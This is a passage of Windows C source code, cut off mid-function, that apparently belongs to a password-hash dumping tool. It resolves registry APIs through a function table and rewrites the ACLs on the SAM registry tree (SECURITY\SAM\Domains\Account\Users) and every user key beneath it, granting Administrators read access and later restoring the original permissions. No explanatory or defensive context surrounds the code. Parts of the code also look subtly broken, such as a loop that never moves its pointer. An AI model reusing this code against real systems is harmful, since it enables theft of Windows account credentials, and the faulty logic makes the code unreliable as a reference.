{ FCT *fct = &gs->fct; va_list ap; SID **sids = 0; char *name; DWORD amask; DWORD acl_size; PACL pacl = 0; int i; if((sids=(SID **)fct->malloc(sizeof(SID *)*num, gs))==0) return FALSE; acl_size = num * (sizeof(ACL) + sizeof(ACCESS_ALLOWED_ACE) + sizeof(DWORD)); // Collect all the SID's va_start( ap, num); for(i=0;i<num;i++) { name = va_arg( ap, char *); amask = va_arg(ap, DWORD); if(get_sid( gs, name, &sids[i]) == FALSE) goto cleanup; acl_size += GetLengthSid(sids[i]); } va_end(ap); if((pacl = (PACL)fct->malloc(acl_size, gs)) == 0) goto cleanup; if(InitializeSecurityDescriptor( sdout, SECURITY_DESCRIPTOR_REVISION) == FALSE) goto cleanup; if(InitializeAcl( pacl, acl_size, ACL_REVISION) == FALSE) goto cleanup; va_start(ap, num); for( i = 0; i < num; i++) { ACE_HEADER *ace_p; name = va_arg( ap, char *); amask = va_arg( ap, DWORD); if(AddAccessAllowedAce( pacl, ACL_REVISION, amask, sids[i]) == FALSE) goto cleanup; // Make sure the ACE is inheritable if(GetAce( pacl, 0, (LPVOID *)&ace_p) == FALSE) goto cleanup; ace_p->AceFlags |= ( CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE); } // Add the ACL into the sd if(SetSecurityDescriptorDacl( sdout, TRUE, pacl, FALSE) == FALSE) goto cleanup; for( i = 0; i < num; i++) { if(sids[i]) fct->free(sids[i], gs); } fct->free(sids, gs); return TRUE; cleanup: if(sids) { for( i = 0; i < num; i++) { if(sids[i]) fct->free(sids[i], gs); } fct->free(sids, gs); } if(pacl) fct->free(pacl, gs); return FALSE; } // // Function to go over all the users in the SAM and set an ACL // on them. // static int set_userkeys_security( GS *gs, HKEY start, const char *path, SECURITY_DESCRIPTOR *psd, HKEY *return_key) { API *api = &gs->api; HKEY key; DWORD err; char usersid[128]; DWORD indx = 0; // Open the path and enum all the user keys - setting the same security on them. if((err=api->pRegOpenKeyEx(start,path,0,KEY_ENUMERATE_SUB_KEYS,&key))!=ERROR_SUCCESS) return -1; // Now enumerate the subkeys, setting the security on them all. 
do { DWORD size; FILETIME ft; size=sizeof(usersid); err=api->pRegEnumKeyEx(key,indx,usersid,&size,0,0,0,&ft); if(err==ERROR_SUCCESS) { HKEY subkey; indx++; if((err=api->pRegOpenKeyEx(key,usersid,0,WRITE_DAC,&subkey))!=ERROR_SUCCESS) { RegCloseKey(key); return -1; } if((err=RegSetKeySecurity(subkey,DACL_SECURITY_INFORMATION,psd))!=ERROR_SUCCESS) { api->pRegCloseKey(subkey); api->pRegCloseKey(key); return -1; } api->pRegCloseKey(subkey); } } while(err==ERROR_SUCCESS); if(err!=ERROR_NO_MORE_ITEMS) { api->pRegCloseKey(key); return -1; } if(return_key==0) api->pRegCloseKey(key); else *return_key=key; return 0; } // // Function to travel down the SAM security tree in the registry and restore // the correct ACL on them. Returns 0 on success. -1 on fail. // static int restore_sam_tree_access( GS *gs, HKEY start ) { API *api = &gs->api; char path[128]; char AdminGroupName[128]; char *p; int i; HKEY key; DWORD err; SECURITY_DESCRIPTOR sd; DWORD admin_mask; admin_mask = WRITE_DAC | READ_CONTROL; api->plstrcpy(AdminGroupName, "Administrators"); if(!create_sd_from_list( gs, &sd, 2, "SYSTEM", GENERIC_ALL,AdminGroupName, admin_mask)) return -1; api->plstrcpy(path,"SECURITY\\SAM\\Domains\\Account\\Users"); // Remove the security on the user keys first. if(set_userkeys_security( gs, start, path, &sd, 0)!=0) return -1; // now go up the path, restoring security do { if((err=api->pRegOpenKeyEx(start,path,0,WRITE_DAC,&key)) != ERROR_SUCCESS) return -1; if((err=RegSetKeySecurity( key, DACL_SECURITY_INFORMATION,&sd)) != ERROR_SUCCESS) { api->pRegCloseKey(key); return -1; } api->pRegCloseKey(key); p=path+(api->plstrlen(path)-1); for(i=(api->plstrlen(path)-1);i>=0;i--) { if(*p=='\\') { *p=0; break; } } } while(i!=-1); return 0; } // // Function to travel the security tree and add Administrators // access as WRITE_DAC, READ_CONTROL and READ. // Returns 0 on success. -1 on fail if no security was changed, // -2 on fail if security was changed. 
// static int set_sam_tree_access( GS *gs, HKEY start, HKEY *return_key ) { API *api = &gs->api; char path[128]; char *p; char AdminGroupName[128]; HKEY key; DWORD err; BOOL security_changed = FALSE; SECURITY_DESCRIPTOR sd; DWORD admin_mask; BOOL finished = FALSE; admin_mask = WRITE_DAC | READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS; api->plstrcpy(AdminGroupName, "Administrators"); if(!create_sd_from_list( gs, &sd, 2, "SYSTEM", GENERIC_ALL, AdminGroupName, admin_mask)) return -1; api->plstrcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users"); p=path; do { while(*p!='\0') { if(*p=='\\') break; p++; } if(*p=='\0') finished=TRUE; else *p='\0'; if((err=api->pRegOpenKeyEx( start, path, 0, WRITE_DAC, &key))!=ERROR_SUCCESS) { return(security_changed ? -2: -1); } if((err=RegSetKeySecurity( key, DACL_SECURITY_INFORMATION, &sd)) != ERROR_SUCCESS) { api->pRegCloseKey(key); return(security_changed ? -2: -1); } security_changed = TRUE; api->pRegCloseKey(key); if(!finished) {*p='\\'; p++;} } while( !finished ); if(set_userkeys_security( gs, start, path, &sd, &key) != 0) return -2; if(return_key==0) api->pRegC... [truncated message content] |